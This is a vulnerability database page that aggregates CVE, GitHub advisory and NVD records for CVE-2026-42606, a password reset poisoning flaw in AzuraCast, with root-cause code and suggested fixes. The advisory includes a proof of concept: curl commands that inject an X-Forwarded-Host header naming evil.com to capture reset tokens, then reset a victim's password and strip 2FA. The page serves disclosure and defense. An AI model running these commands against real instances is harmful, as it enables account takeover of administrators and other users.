Vulnerability-Lookup

CVE-2026-42606 (GCVE-0-2026-42606)

Vulnerability from cvelistv5 – Published: 2026-05-09 19:43 – Updated: 2026-05-09 19:43

Title

AzuraCast: Password Reset Poisoning via Untrusted X-Forwarded-Host Header Leads to Account Takeover and 2FA Bypass

Summary

AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover. This issue has been patched in version 0.23.6.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CWE

CWE-640 - Weak Password Recovery Mechanism for Forgotten Password

Assigner

GitHub_M

References

URL

Tags

	https://github.com/AzuraCast/AzuraCast/security/a…	x_refsource_CONFIRM
	https://github.com/AzuraCast/AzuraCast/commit/7c6…	x_refsource_MISC
	https://github.com/AzuraCast/AzuraCast/releases/t…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	AzuraCast	AzuraCast	Affected: < 0.23.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "AzuraCast",
          "vendor": "AzuraCast",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.23.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker\u0027s server. The attacker then uses the token on the real instance to reset the victim\u0027s password and destroy their 2FA configuration, achieving full account takeover. This issue has been patched in version 0.23.6."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-640",
              "description": "CWE-640: Weak Password Recovery Mechanism for Forgotten Password",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-09T19:43:35.866Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8"
        },
        {
          "name": "https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85"
        },
        {
          "name": "https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6"
        }
      ],
      "source": {
        "advisory": "GHSA-gv7r-3mr9-h5x8",
        "discovery": "UNKNOWN"
      },
      "title": "AzuraCast: Password Reset Poisoning via Untrusted X-Forwarded-Host Header Leads to Account Takeover and 2FA Bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42606",
    "datePublished": "2026-05-09T19:43:35.866Z",
    "dateReserved": "2026-04-29T00:31:15.725Z",
    "dateUpdated": "2026-05-09T19:43:35.866Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42606",
      "date": "2026-05-10",
      "epss": "0.00039",
      "percentile": "0.11581"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42606\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-09T20:16:30.170\",\"lastModified\":\"2026-05-09T20:16:30.170\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker\u0027s server. The attacker then uses the token on the real instance to reset the victim\u0027s password and destroy their 2FA configuration, achieving full account takeover. This issue has been patched in version 0.23.6.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-640\"}]}],\"references\":[{\"url\":\"https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

GHSA-GV7R-3MR9-H5X8

Vulnerability from github – Published: 2026-05-04 21:17 – Updated: 2026-05-04 21:17

Summary

AzuraCast has Password Reset Poisoning via Untrusted X-Forwarded-Host Header that Leads to Account Takeover and 2FA Bypass

Details

Summary

The ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover.

Details

Root Cause 1: Unconditional X-Forwarded-Host Trust

backend/src/Middleware/ApplyXForwarded.php:35-40:

if ($request->hasHeader('X-Forwarded-Host')) {
    $hasXForwardedHeader = true;
    $xfHost = Types::stringOrNull($request->getHeaderLine('X-Forwarded-Host'), true);
    if (null !== $xfHost) {
        $uri = $uri->withHost($xfHost);
    }
}

There is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.

In the default Docker deployment, nginx's PHP location block (util/docker/web/nginx/azuracast.conf.tmpl:150-171) uses fastcgi_pass with include fastcgi_params. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as HTTP_* parameters. The proxy_params.conf file — which explicitly sets X-Forwarded-For, X-Forwarded-Proto, and X-Forwarded-Port — only applies to proxy_pass directives (websocket and vite dev server), NOT to the fastcgi_pass PHP handler. Therefore, client-supplied X-Forwarded-Host reaches PHP unmodified.

Root Cause 2: Request Host Used for Security-Critical URLs

backend/src/Http/Router.php:53-77 in buildBaseUrl():

$useRequest ??= $settings->prefer_browser_url; // default: true

// ...
if ($useRequest || $baseUrl->getHost() === '') {
    $ignoredHosts = ['web', 'nginx', 'localhost'];
    if (!in_array($currentUri->getHost(), $ignoredHosts, true)) {
        $baseUrl = (new Uri())
            ->withScheme($currentUri->getScheme())
            ->withHost($currentUri->getHost())
            ->withPort($currentUri->getPort());
    }
}

With prefer_browser_url = true (the default at backend/src/Entity/Settings.php:109), the request URI host — already poisoned by ApplyXForwarded — is used as the base URL for generating absolute URLs. Even if a base_url is configured in settings, it is overridden by the poisoned request host.

Root Cause 3: Password Reset Generates Absolute URL

backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77:

$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true
);

This URL is embedded in the password reset email sent to the victim.

Root Cause 4: Reset Token Wipes 2FA

backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75:

$user->setNewPassword($data['password']);
$user->two_factor_secret = null;

When a ResetPassword token is consumed, the user's 2FA secret is unconditionally destroyed.

PoC

Prerequisites: An AzuraCast instance with a user account (e.g., admin@target.com) that has 2FA enabled. Attacker controls evil.com with a web server that logs incoming requests.

Step 1: Trigger poisoned password reset

curl -X POST https://target.azuracast.example/forgot \
  -H "X-Forwarded-Host: evil.com" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "email=admin@target.com"

Expected result: The password reset email sent to admin@target.com contains a URL like:

https://evil.com/login-token/abc123def456...

Step 2: Capture the token

When the victim clicks the link in their email, their browser navigates to https://evil.com/login-token/abc123def456.... The attacker's web server at evil.com captures the full URL path, extracting the token abc123def456....

Step 3: Use token on real instance

# First, GET the reset page to obtain CSRF token
curl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...

# Extract CSRF token from response, then POST new password
curl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "csrf=<extracted_csrf_token>&password=AttackerPassword123"

Result: The victim's password is changed to AttackerPassword123 and their 2FA is destroyed (two_factor_secret = null). The attacker is logged in with full access.

Impact

Full account takeover of any user account, including administrators, without any prior authentication
2FA bypass — the password reset flow unconditionally destroys 2FA configuration, negating its security benefit
Administrative compromise — if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings
The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success

Recommended Fix

Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist

In backend/src/Middleware/ApplyXForwarded.php, only apply X-Forwarded-* headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):

// Add trusted proxy check
$trustedProxies = ['127.0.0.1', '::1', 'nginx', 'web'];
$remoteAddr = $request->getServerParams()['REMOTE_ADDR'] ?? '';

if (!in_array($remoteAddr, $trustedProxies, true)) {
    return $handler->handle($request);
}

// ... existing X-Forwarded-* processing

Fix 2 (Defense in depth): Use configured base URL for security-critical emails

In ForgotPasswordAction.php, generate the reset URL using the configured base_url setting rather than the request-derived URL:

$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true,
    // Force use of configured base URL, not request host
);

Or modify Router::buildBaseUrl() to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.

Fix 3 (Defense in depth): Don't wipe 2FA on password reset

In LoginTokenAction.php:75, remove the line $user->two_factor_secret = null;. If 2FA recovery is needed, it should be a separate, explicit flow — not a side effect of password reset.

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.23.5"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "azuracast/azuracast"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.23.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42606"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T21:17:45Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `ApplyXForwarded` middleware unconditionally trusts the client-supplied `X-Forwarded-Host` HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker\u0027s server. The attacker then uses the token on the real instance to reset the victim\u0027s password and destroy their 2FA configuration, achieving full account takeover.\n\n## Details\n\n### Root Cause 1: Unconditional X-Forwarded-Host Trust\n\n`backend/src/Middleware/ApplyXForwarded.php:35-40`:\n```php\nif ($request-\u003ehasHeader(\u0027X-Forwarded-Host\u0027)) {\n    $hasXForwardedHeader = true;\n    $xfHost = Types::stringOrNull($request-\u003egetHeaderLine(\u0027X-Forwarded-Host\u0027), true);\n    if (null !== $xfHost) {\n        $uri = $uri-\u003ewithHost($xfHost);\n    }\n}\n```\n\nThere is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.\n\nIn the default Docker deployment, nginx\u0027s PHP location block (`util/docker/web/nginx/azuracast.conf.tmpl:150-171`) uses `fastcgi_pass` with `include fastcgi_params`. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as `HTTP_*` parameters. The `proxy_params.conf` file \u2014 which explicitly sets `X-Forwarded-For`, `X-Forwarded-Proto`, and `X-Forwarded-Port` \u2014 only applies to `proxy_pass` directives (websocket and vite dev server), NOT to the `fastcgi_pass` PHP handler. Therefore, client-supplied `X-Forwarded-Host` reaches PHP unmodified.\n\n### Root Cause 2: Request Host Used for Security-Critical URLs\n\n`backend/src/Http/Router.php:53-77` in `buildBaseUrl()`:\n```php\n$useRequest ??= $settings-\u003eprefer_browser_url; // default: true\n\n// ...\nif ($useRequest || $baseUrl-\u003egetHost() === \u0027\u0027) {\n    $ignoredHosts = [\u0027web\u0027, \u0027nginx\u0027, \u0027localhost\u0027];\n    if (!in_array($currentUri-\u003egetHost(), $ignoredHosts, true)) {\n        $baseUrl = (new Uri())\n            -\u003ewithScheme($currentUri-\u003egetScheme())\n            -\u003ewithHost($currentUri-\u003egetHost())\n            -\u003ewithPort($currentUri-\u003egetPort());\n    }\n}\n```\n\nWith `prefer_browser_url = true` (the default at `backend/src/Entity/Settings.php:109`), the request URI host \u2014 already poisoned by `ApplyXForwarded` \u2014 is used as the base URL for generating absolute URLs. Even if a `base_url` is configured in settings, it is overridden by the poisoned request host.\n\n### Root Cause 3: Password Reset Generates Absolute URL\n\n`backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77`:\n```php\n$router = $request-\u003egetRouter();\n$url = $router-\u003enamed(\n    routeName: \u0027account:login-token\u0027,\n    routeParams: [\u0027token\u0027 =\u003e $token],\n    absolute: true\n);\n```\n\nThis URL is embedded in the password reset email sent to the victim.\n\n### Root Cause 4: Reset Token Wipes 2FA\n\n`backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75`:\n```php\n$user-\u003esetNewPassword($data[\u0027password\u0027]);\n$user-\u003etwo_factor_secret = null;\n```\n\nWhen a `ResetPassword` token is consumed, the user\u0027s 2FA secret is unconditionally destroyed.\n\n## PoC\n\n**Prerequisites:** An AzuraCast instance with a user account (e.g., `admin@target.com`) that has 2FA enabled. Attacker controls `evil.com` with a web server that logs incoming requests.\n\n### Step 1: Trigger poisoned password reset\n\n```bash\ncurl -X POST https://target.azuracast.example/forgot \\\n  -H \"X-Forwarded-Host: evil.com\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  -d \"email=admin@target.com\"\n```\n\n**Expected result:** The password reset email sent to `admin@target.com` contains a URL like:\n```\nhttps://evil.com/login-token/abc123def456...\n```\n\n### Step 2: Capture the token\n\nWhen the victim clicks the link in their email, their browser navigates to `https://evil.com/login-token/abc123def456...`. The attacker\u0027s web server at `evil.com` captures the full URL path, extracting the token `abc123def456...`.\n\n### Step 3: Use token on real instance\n\n```bash\n# First, GET the reset page to obtain CSRF token\ncurl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...\n\n# Extract CSRF token from response, then POST new password\ncurl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  -d \"csrf=\u003cextracted_csrf_token\u003e\u0026password=AttackerPassword123\"\n```\n\n**Result:** The victim\u0027s password is changed to `AttackerPassword123` and their 2FA is destroyed (`two_factor_secret = null`). The attacker is logged in with full access.\n\n## Impact\n\n- **Full account takeover** of any user account, including administrators, without any prior authentication\n- **2FA bypass** \u2014 the password reset flow unconditionally destroys 2FA configuration, negating its security benefit\n- **Administrative compromise** \u2014 if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings\n- The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success\n\n## Recommended Fix\n\n**Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist**\n\nIn `backend/src/Middleware/ApplyXForwarded.php`, only apply `X-Forwarded-*` headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):\n\n```php\n// Add trusted proxy check\n$trustedProxies = [\u0027127.0.0.1\u0027, \u0027::1\u0027, \u0027nginx\u0027, \u0027web\u0027];\n$remoteAddr = $request-\u003egetServerParams()[\u0027REMOTE_ADDR\u0027] ?? \u0027\u0027;\n\nif (!in_array($remoteAddr, $trustedProxies, true)) {\n    return $handler-\u003ehandle($request);\n}\n\n// ... existing X-Forwarded-* processing\n```\n\n**Fix 2 (Defense in depth): Use configured base URL for security-critical emails**\n\nIn `ForgotPasswordAction.php`, generate the reset URL using the configured `base_url` setting rather than the request-derived URL:\n\n```php\n$router = $request-\u003egetRouter();\n$url = $router-\u003enamed(\n    routeName: \u0027account:login-token\u0027,\n    routeParams: [\u0027token\u0027 =\u003e $token],\n    absolute: true,\n    // Force use of configured base URL, not request host\n);\n```\n\nOr modify `Router::buildBaseUrl()` to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.\n\n**Fix 3 (Defense in depth): Don\u0027t wipe 2FA on password reset**\n\nIn `LoginTokenAction.php:75`, remove the line `$user-\u003etwo_factor_secret = null;`. If 2FA recovery is needed, it should be a separate, explicit flow \u2014 not a side effect of password reset.",
  "id": "GHSA-gv7r-3mr9-h5x8",
  "modified": "2026-05-04T21:17:45Z",
  "published": "2026-05-04T21:17:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AzuraCast/AzuraCast"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AzuraCast has Password Reset Poisoning via Untrusted X-Forwarded-Host Header that Leads to Account Takeover and 2FA Bypass"
}

FKIE_CVE-2026-42606

Vulnerability from fkie_nvd - Published: 2026-05-09 20:16 - Updated: 2026-05-09 20:16

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85
	security-advisories@github.com	https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6
	security-advisories@github.com	https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker\u0027s server. The attacker then uses the token on the real instance to reset the victim\u0027s password and destroy their 2FA configuration, achieving full account takeover. This issue has been patched in version 0.23.6."
    }
  ],
  "id": "CVE-2026-42606",
  "lastModified": "2026-05-09T20:16:30.170",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-09T20:16:30.170",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-640"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42606 (GCVE-0-2026-42606)

GHSA-GV7R-3MR9-H5X8

Summary

Details

Root Cause 1: Unconditional X-Forwarded-Host Trust

Root Cause 2: Request Host Used for Security-Critical URLs

Root Cause 3: Password Reset Generates Absolute URL

Root Cause 4: Reset Token Wipes 2FA

PoC

Step 1: Trigger poisoned password reset

Step 2: Capture the token

Step 3: Use token on real instance

Impact

Recommended Fix

FKIE_CVE-2026-42606

Tags

Sightings

Nomenclature